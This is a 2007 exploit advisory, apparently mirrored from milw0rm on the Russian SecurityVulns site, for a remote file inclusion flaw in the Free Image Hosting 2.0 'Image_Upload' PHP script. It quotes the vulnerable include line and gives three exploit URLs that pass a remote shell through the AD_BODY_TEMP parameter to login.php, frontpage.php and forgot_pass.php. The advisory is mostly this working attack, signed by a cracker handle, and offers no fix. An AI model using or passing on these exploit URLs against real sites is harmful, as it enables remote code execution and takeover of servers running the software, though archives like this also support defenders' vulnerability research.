Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Net Side Content Management System

  aspWebCalendar Remote SQL Injection Vulnerability

  LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

  ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

From:crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:25 марта 2007 г.
Subject:Image_Upload Script Remote File Inclusion Exploit Free Image Hosting 2.0

#################################################################################
###########
Baslik  :Image_Upload Script  Remote File Inclusion Exploit
        Free Image Hosting 2.0

.ndir   : http://free-php-scripts.net/scripts/Image_Upload.zip

Bulan   :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

       : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

       :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not     :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz  : EveryBody
#################################################################################
###########

# milw0rm.com [2007-03-25]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород